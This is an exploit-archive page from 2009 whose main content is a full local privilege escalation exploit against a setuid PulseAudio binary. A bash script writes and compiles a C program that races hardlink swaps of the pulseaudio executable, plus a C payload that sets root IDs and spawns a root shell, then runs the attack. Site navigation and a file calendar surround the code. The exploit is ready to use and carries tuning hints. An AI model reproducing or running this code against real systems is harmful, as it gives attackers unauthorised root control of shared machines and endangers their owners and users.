what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Pulse Audio setuid Privilege Escalation

Pulse Audio setuid Privilege Escalation
Posted Jul 20, 2009

Pulse Audio setuid local privilege escalation exploit.

tags | exploit, local
SHA-256 | f0999000ab3ea0a79806e55c0a5c67d933478e0f8285df18faae4f664ed09b5a
Download | Favorite | View

Pulse Audio setuid Privilege Escalation

Change Mirror Download
#!/bin/bash

pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`

trap cleanup INT

function cleanup()
{
  rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c 
  rm -rf $workdir/PATMP*
}

cat > $workdir/pa_race.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/wait.h>

#define PULSEAUDIO_PATH    "$pulseaudio"
#define SH_PATH      "$workdir/sh"
#define TMPDIR_TEMPLATE    "$workdir/PATMPXXXXXX"

void _pause(long sec, long usec);

int main(int argc, char *argv[], char *envp[])
{
  int   status;
  pid_t pid;
  char  template[sizeof(TMPDIR_TEMPLATE)];
  char *tmpdir;
  char  hardlink[sizeof(template) + 2];
  char  hardlink2[sizeof(template) + 12];
  
  srand(time(NULL));
  
  for( ; ; )
  {
    snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
    template[sizeof(template) - 1] = '\0';
    
    tmpdir = mkdtemp(template);
    if(tmpdir == NULL)
    {
      perror("mkdtemp");
      return 1;
    }
  
    snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
    hardlink[sizeof(hardlink) - 1] = '\0';
  
    snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
    hardlink2[sizeof(hardlink2) - 1] = '\0';
  
    /* this fails if $workdir is a different partition */
    if(link(PULSEAUDIO_PATH, hardlink) == -1)
    {
      perror("link");
      return 1;
    }
    
    if(link(SH_PATH, hardlink2) == -1)
    {
      perror("link");
      return 1;
    }
    
    pid = fork();
    
    if(pid == 0)
    {
      char *argv[] = {hardlink, NULL};
      char *envp[] = {NULL};

      execve(hardlink, argv, envp);
      
      perror("execve");
      return 1;
    }
    
    if(pid == -1)
    {
      perror("fork");
      return 1;
    }
    else
    {
      /* tweak this if exploit does not work */
      _pause(0, rand() % 500);
      
      if(unlink(hardlink) == -1)
      {
        perror("unlink");
        return 1;
      }
  
      if(link(SH_PATH, hardlink) == -1)
      {
        perror("link");
        return 1;
      }
      waitpid(pid, &status, 0);
    }
    
    if(unlink(hardlink) == -1)
    {
      perror("unlink");
      return 1;
    }
    
    if(unlink(hardlink2) == -1)
    {
      perror("unlink");
      return 1;
    }
    
    if(rmdir(tmpdir) == -1)
    {
      perror("rmdir");
      return 1;
    }
  }
    
  return 0;
}

void _pause(long sec, long usec)
{
  struct timeval timeout;
  
  timeout.tv_sec  = sec;
  timeout.tv_usec = usec;
  
  if(select(0, NULL, NULL, NULL, &timeout) == -1)
  {
    perror("select");
  }
}
__EOF__

cat > $workdir/sh.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>


int main(int argc, char *argv[], char *envp[])
{
  if(geteuid() != 0)
  {
    return 1;
  }

  setuid(0);
  setgid(0);

  if(fork() == 0)
  {
    argv[0] = "$id";
    argv[1] = NULL;
    execve(argv[0], argv, envp);
    return 1;
  }

  argv[0] = "$shell";
  argv[1] = NULL;
  execve(argv[0], argv, envp);
  return 1;
}
__EOF__

gcc -o $workdir/pa_race $workdir/pa_race.c
gcc -o $workdir/sh $workdir/sh.c

$workdir/pa_race


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close